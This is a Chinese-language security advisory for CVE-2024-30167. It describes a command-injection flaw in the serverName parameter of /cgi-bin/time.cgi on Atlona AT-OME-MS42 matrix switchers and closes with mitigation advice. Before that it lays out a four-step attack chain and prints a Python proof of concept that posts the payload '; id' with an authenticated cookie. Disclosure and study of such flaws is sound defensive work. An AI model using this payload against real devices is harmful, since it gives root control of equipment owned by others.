CVE-2024-30167 Atlona切换器命令注入漏洞

漏洞信息

漏洞编号

CVE-2024-30167

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Atlona AT-OME-MS42 Matrix Switcher

漏洞概述

Atlona AT-OME-MS42 Matrix Switcher设备固件1.1.2版本中存在严重的安全缺陷。该漏洞位于/cgi-bin/time.cgi接口，由于未能正确过滤用户输入，经过身份验证的远程攻击者可以通过构造包含恶意Payload的POST请求，利用serverName参数触发命令注入。成功利用此漏洞可导致攻击者以root权限在底层操作系统上执行任意命令，进而完全控制设备，造成敏感数据泄露或服务中断等严重后果。

技术细节

该漏洞的核心原理在于Atlona AT-OME-MS42设备Web服务接口中的/cgi-bin/time.cgi脚本未对用户输入进行严格的过滤和转义。当拥有低权限账户的用户访问该时间配置页面时，系统会接收通过POST请求提交的参数。其中，`serverName`参数直接被拼接到系统命令字符串中并传递给底层Shell执行。攻击者可以利用Shell元字符（如分号、管道符、反引号等）截断原有命令逻辑，并追加任意操作系统指令。由于该CGI脚本通常以高权限（如root）运行，注入的命令将以最高权限执行。这使得攻击者能够读取敏感配置文件、安装后门程序或修改系统设置，从而完全绕过系统原有的安全防护机制，实现对设备的持久化控制。

攻击链分析

STEP 1

侦察与访问

攻击者通过网络扫描发现目标Atlona设备，并获取一个低权限账户凭据。

STEP 2

构造恶意请求

攻击者向/cgi-bin/time.cgi端点发送POST请求，在serverName参数中注入Shell命令（如; id）。

STEP 3

命令注入

服务器端脚本未过滤特殊字符，将serverName参数拼接到系统命令中并执行Shell指令。

STEP 4

获取Root权限

由于CGI脚本以root权限运行，攻击者成功执行任意代码，获得设备的最高控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable cgi script
target_url = "http://target-ip/cgi-bin/time.cgi"

# Attacker's session cookie (Authentication is required as per PR:L)
cookies = {
    "session_id": "valid_auth_token_here"
}

# Payload to execute 'id' command using command injection
# The semicolon (;) terminates the intended command and executes the injected one
payload = "; id"

# The vulnerable parameter
data = {
    "serverName": payload
}

try:
    response = requests.post(target_url, data=data, cookies=cookies, timeout=10)
    print(f"Status Code: {response.status_code}")
    print("Response Body:")
    print(response.text)
    # Check if command execution was successful (e.g., looking for 'uid=0(root)')
    if "uid=" in response.text:
        print("[+] Command injection successful!")
except Exception as e:
    print(f"Error: {e}")

影响范围

Atlona AT-OME-MS42 Matrix Switcher 1.1.2

防御指南

临时缓解措施

建议用户立即联系Atlona官方获取安全更新并升级固件。在升级前，应将设备置于隔离网络中，或通过防火墙规则严格限制外部对TCP 80/443端口的访问，同时加强对低权限账户的监控，防止被利用进行提权攻击。